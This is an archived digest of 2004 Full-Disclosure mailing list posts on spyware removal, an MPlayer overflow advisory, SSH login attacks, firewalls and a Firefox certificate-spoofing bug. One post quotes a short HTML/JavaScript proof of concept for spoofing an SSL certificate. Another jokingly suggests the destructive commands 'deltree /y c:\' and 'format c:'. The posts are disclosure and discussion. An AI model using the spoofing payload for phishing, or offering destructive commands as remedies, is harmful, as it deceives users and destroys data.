To: "Full-disclosure" <full-disclosurelists.netsys.com>
From: <3APA3ASECURITY.NNOV.RU>
Message-ID: <puicynacljmcxfkwqldlists.netsys.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_04A2_01C476E1.6A1C8670"
Subject: [Full-Disclosure] Re:
Sender: <full-disclosure-adminlists.netsys.com>
Errors-To: full-disclosure-adminlists.netsys.com
X-BeenThere: full-disclosurelists.netsys.com
X-Mailman-Version: 2.0.12
Precedence: bulk
List-Unsubscribe: <http://lists.netsys.com/mailman/listinfo/full-disclosure>,<mailto:full-disclosure-requestlists.netsys.com?subject=unsubscribe>
List-Id: Discussion of security issues <full-disclosure.lists.netsys.com>
List-Post: <mailto:full-disclosurelists.netsys.com>
List-Help: <mailto:full-disclosure-requestlists.netsys.com?subject=help>
List-Subscribe: <http://lists.netsys.com/mailman/listinfo/full-disclosure>,<mailto:full-disclosure-requestlists.netsys.com?subject=subscribe>
List-Archive: <http://lists.netsys.com/pipermail/full-disclosure/>
Date: Thu, 29 Jul 2004 20:01:34 -0300
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: -2 (not scanned, spam filter disabled)

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:22 CDT

>
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

Probably you want regenhancer from the same co that create ad-aware this does exactly what you want, and now a days even ad-aware has a plugin that does this check it out under the pulgins category.

but why use a program just hunt down the registry key with regedit and you are done and export the info in a text file ....

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Automated SSH login attempts?

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:22 CDT

> seems like...' are not exactly results of an analysis.

these small things definatly add up in the final analysis but we need to be through about them and it certainly needs to be included in the final analysis of the malware

> This things needs to be disassembled, debugged and traced. All
> else is just whistling in the dark.

and write a authorative analysis about this and post it where all like us can read...

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:21 CDT

>
> Where there are not short-cut workarounds this means removing the
> software manually is simply impossible. Currently a trip into Safe Mode
> can do the trick, by stopping any of the software running, but I'm sure
> that'll be worked around too eventually. (Rootkit-like spyware?)

complete with a remote shell, ftp server and ddos bot with irc capabities along with spam bot capabilities ?

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:41:05 CDT

> We are all computer people - fixing one computer is easy but could take 4
> hours - not very helpful on a mass scale. We pay for point and click, why
> shouldn't we get it? ;)

the sweet word over here is automation even if one computer takes 4 hours to clean but if can find a way to do that and automate you have proved your worth to your employer and that is what your employer is paying you for... if we dont get point and click then we make it point and click and not buy anything in this case

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:49:56 CDT

> >Absolute and utter rot! I understand YOU may not be able to do
> it but it CAN
> >be done. It is simple logic if you want to look at it another
> way - whatever
> >can be DONE can be UNdone.
> >
>
> Did you really mean "whatever can be done can be UNdone"?
> How about a format C:? (I haven't seen "unformat" in a very long time.)
>

there are ways and means to do this with proper tools. i recently did this with my hdd and recovred 98% of all my data.....

now as we can all see this is heading into another flame war can we stop this thread except and post some relevant info( formatting has no relation with CWS whatsoever )

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:21 CDT

> Try a deltree /y c:\ that usually does the trick.

and maybe format c:

and reboot to install freebsd / solaris / linux or whatever version of unix

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 02:36:17 CDT

> I did. Regardless of what it says, CWShredder doesn't get rid of all
> variants of CoolWebSearch.

this i found to be true in many cases, but however could the original poster please post some more info about removing the CWS ...

-aditya

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200408-01 ] MPlayer: GUI filename handling overflow

From: Thierry Carrez (koongentoo.org)
Date: Sun Aug 01 2004 - 05:01:54 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200408-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: GUI filename handling overflow
      Date: August 01, 2004
      Bugs: #55456
        ID: 200408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

When compiled with GUI support MPlayer is vulnerable to a remotely
exploitable buffer overflow attack.

Background
==========

MPlayer is a media player capable of handling multiple multimedia file
formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 media-video/mplayer < 1.0_pre4-r7 >= 1.0_pre4-r7

Description
===========

The MPlayer GUI code contains several buffer overflow vulnerabilities,
and at least one in the TranslateFilename() function is exploitable.

Impact
======

By enticing a user to play a file with a carefully crafted filename an
attacker could execute arbitrary code with the permissions of the user
running MPlayer.

Workaround
==========

To work around this issue, users can compile MPlayer without GUI
support by disabling the gtk USE flag. All users are encouraged to
upgrade to the latest available version of MPlayer.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=media-video/mplayer-1.0_pre4-r7"
    # emerge ">=media-video/mplayer-1.0_pre4-r7"

References
==========

  [ 1 ] Bugtraq Announcement
        http://www.securityfocus.com/bid/10615/
  [ 2 ] Open-Security Announcement
        http://www.open-security.org/advisories/5

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200408-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBDL+RvcL1obalX08RAvsoAKCa7xHOPPs+5E8kNoTvVcOYQIbCvwCeIDi6
SlzDBE5aEtx+3UvEFCh5CVo=
=n4Pk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Yaakov Yehudi (yehuditehila.gov.il)
Date: Sun Aug 01 2004 - 06:47:48 CDT

BHO Demon 2.0
http://www.definitivesolutions.com/bhodemon.htm

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 18:00
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis and AboutBuster.

Spybot and AdAware did not detect the BHO elements.

Film & TV Extras urgently required in your area - See Yourself in major
Films & TV? Call 0907 1512440 to Register. calls cost 150pm

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] 0xdefaced[6]

From: root (rootserver2.eurolab.at)
Date: Sat Jul 31 2004 - 22:11:28 CDT

hi, my name is Johny Knoxville and i wanna present 2 u
new issue of russina underground zine 0xdefaced[6].

mirrors:
www.linux-party.at/defaced/defaced6e.zip
www.linux-party.at/defaced/defaced6r.zip
www.eurolab.at/defaced/defaced6e.zip
www.eurolab.at/defaced/defaced6r.zip
www.it-guru.at/defaced/defaced6e.zip
www.it-guru.at/defaced/defaced6r.zip
www.it-master.at/defaced/defaced6e.zip
www.it-master.at/defaced/defaced6r.zip
www.videopool.at/defaced/defaced6e.zip
www.videopool.at/defaced/defaced6r.zip
www.ihf-hr.org/defaced/defaced6e.zip
www.ihf-hr.org/defaced/defaced6r.zip
www.multisystem.at/defaced/defaced6e.zip
www.multisystem.at/defaced/defaced6r.zip
www.finker.at/defaced/defaced6e.zip
www.finker.at/defaced/defaced6r.zip

e - english version
r - russian

enjoy!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[sb] Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Juan Carlos Navea (loconetgmail.com)
Date: Sun Aug 01 2004 - 09:15:39 CDT

Has anyone tried the proof of concept with a real ssl cert and get it working?

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on bugzilla either.

Im using:

0.9.2 on Windows2k

On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
> Has this been posted to bugilla????
>
> E.Kellinis wrote:
> > #########################################
> > Application: Mozilla Firefox
> > Vendors: http://www.mozilla.com
> > Version: 0.9.1 / 0.9.2
> > Platforms: Windows
> > Bug: Certificate Spoofing (Phishing)
> > Risk: High
> > Exploitation: Remote with browser
> > Date: 25 July 2004
> > Author: Emmanouel Kellinis
> > e-mail: mecipher(dot)org(dot)uk
> > web: http://www.cipher.org.uk
> > List : BugTraq(SecurityFocus)/ Full-Disclosure
> > #########################################
> >
> >
> > =======
> > Product
> > =======
> > A popular Web browser,good alternative of IE and
> > "The web browser" for linux machines,
> > used to view pages on the World Wide Web.
> >
> > ===
> > Bug
> > ===
> >
> > Firefox has caching problem, as a result of that someone can
> > spoof a certificate of any website and use it as his/her own.
> > The problem is exploited using onunload inside < body> and
> > redirection using Http-equiv Refresh metatag,document.write()
> > and document.close()
> >
> > First you direct the redirection metatag to the website
> > of which you want to spoof the certificate, then inside
> > the < body> tag you add onulnoad script so you can control
> > the output inside the webpage with the spoofed certificate.
> >
> > After that you say to firefox, as soon as you unload this page
> > close the stream, aparently the stream you close is
> > the redirection website, you do that with
> > document.close().
> >
> > Now you can write anything you want , you do that
> > using document.write(). After writing the content of you choice
> > you close the stream again , usually firefox wont display your content,
> > although if you check the source code you see it , so the last thing
> > is to refresh the new page (do that using window.location.reload()),
> > after that you have your domain name in the url field , your content
> > in the browser and the magic yellow Lock on the bottom left corner,
> > if you pass your mouse over it you will see displayed the name of
> > the website you spoofed the certificate, if you double click on it you
> > will check full information of the certificate without any warning !
> >
> > You dont need to have SSL in your website ! it will work with
> > http.
> >
> > Additional using this bug malicious websites can bypass content
> > filtering using SSL properties.
> >
> >
> > =====================
> > Proof Of Concept Code
> > =====================
> >
> > < HTML>
> > < HEAD>
> > < TITLE>Spoofer< /TITLE>
> > < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
> > < /HEAD>
> > < BODY
> > onunload="
> > document.close();
> > document.writeln('< body onload=document.close();break;>
> > < h3>It is Great to Use example's Cert!');
> >
> > document.close();
> > window.location.reload();
> > ">
> > < /body>
> >
> >
> > =========================================================
> > *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> > =========================================================
>
> --
> Stephen Samuel +1(604)876-0426 samuelbcgreen.com
> http://www.bcgreen.com/~samuel/
> Powerful committed communication. Transformation touching
> the jewel within each person and bringing it to light.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
http://scott.telnetd.com/loco/

--
 Sie haben den Sicherheitsboten abonniert.
 http://sicherheitsbote.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Automated SSH login attempts? Related Cross post from incidents.org

From: Jirka Kosina (jikosjikos.cz)
Date: Sun Aug 01 2004 - 10:49:04 CDT

On Fri, 30 Jul 2004, Harris, Michael C. wrote:

> We got zapped by some hackers from, I think, Romania that have a priv
> escalation exploit for Linux 2.4.20
> http://sirzion.illusivecreations.com/loginxy

This exploit really shouldn't be dangerous for any admin updating at least
once a year <g> - it is just a scriptkiddie exploit for old do_brk()
bounds check vulnerability.

--
JiKos.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Goetz Von Berlichingen (goetzvonberlichingencomcast.net)
Date: Sun Aug 01 2004 - 11:19:38 CDT

Ron DuFresne wrote:
..
> Google search: IPtables SPI ;;
>
> http://www.google.com/search?q=IPtables+SPI&sourceid=mozilla-search&start=0&start=0

   A better search would be
http://www.google.com/search?q=iptables+State+Packet+Inspection&sourceid=mozilla-search&start=0&start=0,

since yours hits on the patch for IPSEC that allows filtering on
Security Parameter Index (SPI).

   The original message has some merit with respect to netfilter - the
Linux kernel firewall is capable of looking at headers only. This does
allow some stateful packet inspection - one can discriminate against
incoming connection attempts with --syn, for instance. This isn't
really stateful, however, since the firewall does not retain any
knowledge of the state of a connection. iptables is pretty much useless
agains covert channels such as Loki, Q, or any of the various tunneling
packages.

   The problem with stateful inspection is that it so easily leads to
self-denial of service. An attacker need only make enough legitimate
connections to overflow the firewall's capability. At that point, the
firewall either crashes or quits stateful inspection. Perhaps Mr. Gray
should consider how to add true stateful packet inspection to the
iptables software and contribute that patch back to the community?

Goetz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re:

From: Jan Muenther (jan.muenthernruns.com)
Date: Sun Aug 01 2004 - 11:12:11 CDT

Hi,

> This guy has been sending out viruses unknown to him his machine has been infected...

No, he hasn't. This is some worm forging mail senders, which is not the
slightest problem at all given the functionings of SMTP. In fact, most modern
self-spreading mail worms even come with an own SMTP engine and collect sender
addresses to spoof from different sources. 3APA3A is not an idiot and he
can't change the fact that some poor soul's b0rken PC (IP originates somewhere
in Cordoba, eh) is sending out worms forging his address. Neither can I or you.

You can try and reach the security contact for the ISP the IP's from. Good
luck with that.

> Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534 for <full-disclosurelists.netsys.com>; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)

^^^^^^^^^^^^^^^
First sender.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: evilninja (evilninjagmx.net)
Date: Sun Aug 01 2004 - 13:13:54 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Peter Besenbruch wrote:
> This was fixed by the July 27 builds in both Firefox 0.9.2( or 1) and
> Mozilla 1.7. The Mozilla 1.4 branch was also updated.

i was not able to reproduce it in "Gecko/20040719 Firefox/0.9.1" either.
all i get is the real https:// site and this in the JS log:

Error: unterminated string literal
Source File:
Line: 1, Column: 17
Source Code:
document.writeln('<body onload=document.close();break;>

- --
BOFH excuse #175:

OS swapped to disk
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBDTLiC/PVm5+NVoYRAiniAJ4mfLUGO6xXY416FdpUXrHNJxmPYQCghIpT
26nz7GNlQ5bD8M17Q11gFJU=
=1s8C
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] 0xdefaced[6]

From: Collin (myuupojo.com)
Date: Sun Aug 01 2004 - 14:17:11 CDT

All are 404.

On Jul 31, 2004, at 10:11 PM, root wrote:

> hi, my name is Johny Knoxville and i wanna present 2 u
> new issue of russina underground zine 0xdefaced[6].
>
> mirrors:
> www.linux-party.at/defaced/defaced6e.zip
> www.linux-party.at/defaced/defaced6r.zip
> www.eurolab.at/defaced/defaced6e.zip
> www.eurolab.at/defaced/defaced6r.zip
> www.it-guru.at/defaced/defaced6e.zip
> www.it-guru.at/defaced/defaced6r.zip
> www.it-master.at/defaced/defaced6e.zip
> www.it-master.at/defaced/defaced6r.zip
> www.videopool.at/defaced/defaced6e.zip
> www.videopool.at/defaced/defaced6r.zip
> www.ihf-hr.org/defaced/defaced6e.zip
> www.ihf-hr.org/defaced/defaced6r.zip
> www.multisystem.at/defaced/defaced6e.zip
> www.multisystem.at/defaced/defaced6r.zip
> www.finker.at/defaced/defaced6e.zip
> www.finker.at/defaced/defaced6r.zip
>
> e - english version
> r - russian
>
> enjoy!
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] change the value of Cookies

From: Jarlin l'enchanteur (jarlinifrance.com)
Date: Sun Aug 01 2004 - 16:28:34 CDT

Hi List
I'm gonna to ask some stupid question for the security guru :)
How can we change the values og a cookies ????????
I'have used a pxxy (SPIKE proxy) to do that but I haven't find an
elegant way to do this :(
thanks to all

___[ Pub ]____________________________________________________________
Inscrivez-vous gratuitement sur Tandaime, Le site de rencontres !
http://rencontre.rencontres.com/index.php?origine=4

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Alain Crespo (gazpaeuskalnet.net)
Date: Sun Aug 01 2004 - 17:07:51 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Saturday 31 July 2004 17:59, Aviv Raff wrote:
> Confirmed. Using FireFox 0.9.2 on XP and Win2k3.

Also works on linux (Firefox 0.9.1)
- --

un saludo,

Alain Crespo <gazpaeuskalnet.net>

_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_,.-:*"``'*:-.,_

Why use Windows, since there is a door?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBDWm+P3/+R0rF2wkRAqQcAKDFka8cy2jyT9Vk0sLm9DlN/YmCxQCfemIh
S+q6XtEMSWEbLgcLKMBjGnk=
=hbRG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] change the value of Cookies

From: Jan Muenther (jan.muenthernruns.com)
Date: Sun Aug 01 2004 - 17:24:35 CDT

> I'm gonna to ask some stupid question for the security guru :)
> How can we change the values og a cookies ????????
> I'have used a pxxy (SPIKE proxy) to do that but I haven't find an
> elegant way to do this :(

I use ELZA:

http://www.stoev.org/elza/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Sun Aug 01 2004 - 13:14:43 CDT

> A better search would be
> http://www.google.com/search?q=iptables+State+Packet+Inspection&sourceid=mozilla-search&start=0&start=0,
>
> since yours hits on the patch for IPSEC that allows filtering on Security
> Parameter Index (SPI).
>
> The original message has some merit with respect to netfilter - the
> Linux kernel firewall is capable of looking at headers only. This does
> allow some stateful packet inspection - one can discriminate against
> incoming connection attempts with --syn, for instance. This isn't really
> stateful, however, since the firewall does not retain any knowledge of the
> state of a connection. iptables is pretty much useless agains covert
> channels such as Loki, Q, or any of the various tunneling packages.
>
> The problem with stateful inspection is that it so easily leads to
> self-denial of service. An attacker need only make enough legitimate
> connections to overflow the firewall's capability. At that point, the
> firewall either crashes or quits stateful inspection.

Or causes DoS'ing. If storage was FILO rather than FIFO. Chucking away the
oldest states first, then presumably you just get general DoS'ing effect.
DoS'ing begets DoS'ing.

> Perhaps Mr. Gray should consider how to add true stateful packet
> inspection to the iptables software and contribute that patch back to the
> community?

Already done :-

        http://www.netfilter.org/

Not my contribution, I am more interested in creating a good free open
source SPI presonal firewall for Windows.

Aaron

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] SSH login attempts: tcpdump packet capture

From: Jay Libove (libovefelines.org)
Date: Sun Aug 01 2004 - 13:03:39 CDT

I got a packet capture of one of the SSH2 sessions trying to log in as a
couple of illegal usernames. The contents of one packet suggests an
attempt to buffer overflow the SSH server; ethereal's SSH decoding says
"overly large value".

It didn't seem to work against my system (I see no strange processes
running; all files changed in past ten days look normal).

I am cross-posting this message and the attached tcpdump packet capture
file to the following places to let better people than I analyze it:
        openssh-unix-devmindrot.org
        secureshellsecurityfocus.com
        full-disclosurelists.netsys.com
        vulnwatchvulnwatch.org

-Jay Libove, CISSP

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] 0xdefaced[6]

From: Phuong Nguyen (phuongecqurity.com)
Date: Sun Aug 01 2004 - 18:34:59 CDT

I was able to get the file any address earlier. Nice piece of work ;)
just like the *little phrack* hehe. I can't wait till phrack64.

Phuong

At 02:17 AM 8/2/2004, Collin wrote:
>All are 404.
>
>On Jul 31, 2004, at 10:11 PM, root wrote:
>
>>hi, my name is Johny Knoxville and i wanna present 2 u
>>new issue of russina underground zine 0xdefaced[6].
>>
>>mirrors:
>>www.linux-party.at/defaced/defaced6e.zip
>>www.linux-party.at/defaced/defaced6r.zip
>>www.eurolab.at/defaced/defaced6e.zip
>>www.eurolab.at/defaced/defaced6r.zip
>>www.it-guru.at/defaced/defaced6e.zip
>>www.it-guru.at/defaced/defaced6r.zip
>>www.it-master.at/defaced/defaced6e.zip
>>www.it-master.at/defaced/defaced6r.zip
>>www.videopool.at/defaced/defaced6e.zip
>>www.videopool.at/defaced/defaced6r.zip
>>www.ihf-hr.org/defaced/defaced6e.zip
>>www.ihf-hr.org/defaced/defaced6r.zip
>>www.multisystem.at/defaced/defaced6e.zip
>>www.multisystem.at/defaced/defaced6r.zip
>>www.finker.at/defaced/defaced6e.zip
>>www.finker.at/defaced/defaced6r.zip
>>
>>e - english version
>>r - russian
>>
>>enjoy!
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re:

From: Ekat (ekatliquidpages.com)
Date: Sun Aug 01 2004 - 21:21:39 CDT